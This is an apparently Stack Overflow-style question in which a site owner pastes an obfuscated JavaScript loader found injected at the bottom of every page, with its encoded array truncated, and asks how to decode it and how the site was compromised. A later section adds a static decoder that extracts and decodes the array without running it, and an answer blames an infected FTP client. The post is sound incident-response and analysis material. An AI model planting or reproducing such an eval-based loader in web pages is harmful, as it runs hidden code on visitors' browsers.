Tom

Reputation: 16270

Website Security - Hacked by this JS script

Our site is hosted on a rather popular .NET hosting provider. So I assume it is secure and the problem is on our side. Please tell me if I am wrong.

I received complaints from my website saying it has a virus in it. So I went to check the home page.

I noticed in every page we have the following extra piece of script at the bottom of the page!

<script>
try{document["b"+"o"+"d"+"y"]*=document}
catch(dgsgsdg){zxc=12;ww=window;}
try{d=document["createElement"]("span");}
catch(agdsg){zxc=0;}
try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}
catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}</script><script>try{window.document.body/=2}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{document.body--;}catch(bawetawe){if(ww.document){v=window;
n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h" .... ];
//truncated for security reasons

h=2;s="";if(zxc){for(i=0;i-632!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"]
(parseInt(n[i],12*2+1+1));}z=s;ww["eval"](s);}}}}
</script></body>

Only I know the password and I swear I didn't give it to anyone. The password is random and up to the security standard. We change the password about once a year, not very frequent I know, but I guess it is okay.

Questions are:

  1. WTF is this script doing? How can I reverse-engineer the n=["9".....] array? I want to find a trace.

  2. In what possible ways did we screw up and let the hacker come in? In this case could he have done it in any way other than brute forcing our password and getting lucky?

Upvotes: 1

Views: 700
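
For question 1, the array can be read without running the script. The following is an added example, not part of the original post: it decodes the tokens as base-26 numbers (the script's `12*2+2`) into characters and never calls `eval`. The function names are hypothetical, and the sample holds only the array elements visible above.

```javascript
// Static decoder for the obfuscated array: decodes, never evals.
const RADIX = 26; // the page's script computes this as 12*2+2 and 12*2+1+1

// Constructed sample: only the elements visible on the page (the rest is truncated there).
const SAMPLE = 'n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h"];';

// Pull the quoted tokens out of the first `n=[...]` literal using text matching only.
function extractTokens(scriptText) {
  const m = /n\s*=\s*\[([^\]]*)\]/.exec(scriptText);
  if (!m) return [];
  return Array.from(m[1].matchAll(/"([^"]*)"/g), (t) => t[1]);
}

// Strictly convert one token; parseInt alone would silently accept "3z" as 3.
function tokenToCode(token, radix) {
  const digits = "0123456789abcdefghijklmnopqrstuvwxyz".slice(0, radix);
  const lower = token.toLowerCase();
  if (lower.length === 0 || [...lower].some((c) => !digits.includes(c))) {
    throw new RangeError(`token ${JSON.stringify(token)} is not valid base ${radix}`);
  }
  return parseInt(lower, radix);
}

// Rebuild the hidden source text as a plain string for inspection.
function decodeTokens(tokens, radix = RADIX) {
  return tokens.map((t) => String.fromCharCode(tokenToCode(t, radix))).join("");
}

// List URLs in decoded text so they can be searched for in logs or blocked.
function findUrls(text) {
  return text.match(/https?:\/\/[^\s"'<>)]+/g) || [];
}

function analyze(scriptText) {
  const decoded = decodeTokens(extractTokens(scriptText));
  return { decoded, urls: findUrls(decoded) };
}

if (typeof require !== "undefined" && require.main === module) {
  const { decoded, urls } = analyze(SAMPLE);
  console.log(JSON.stringify(decoded)); // JSON.stringify keeps tabs and newlines visible
  console.log(urls);
}
```

Run it on a saved copy of the infected page with the full array; any URLs it lists are the trace to look for in server and proxy logs.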

Answers (1)

Tom

Reputation: 16270

"A snippet at the bottom of every page is usually an indication that your FTP program is infected and needs to be removed/changed. – techfoobar"

Although I am not 100% sure, I think techfoobar is correct. The FTP software I was using to upload the site must have been infected. I don't know how it happened, but it has crashed and is no longer functioning in the OS now.

Upvotes: 1
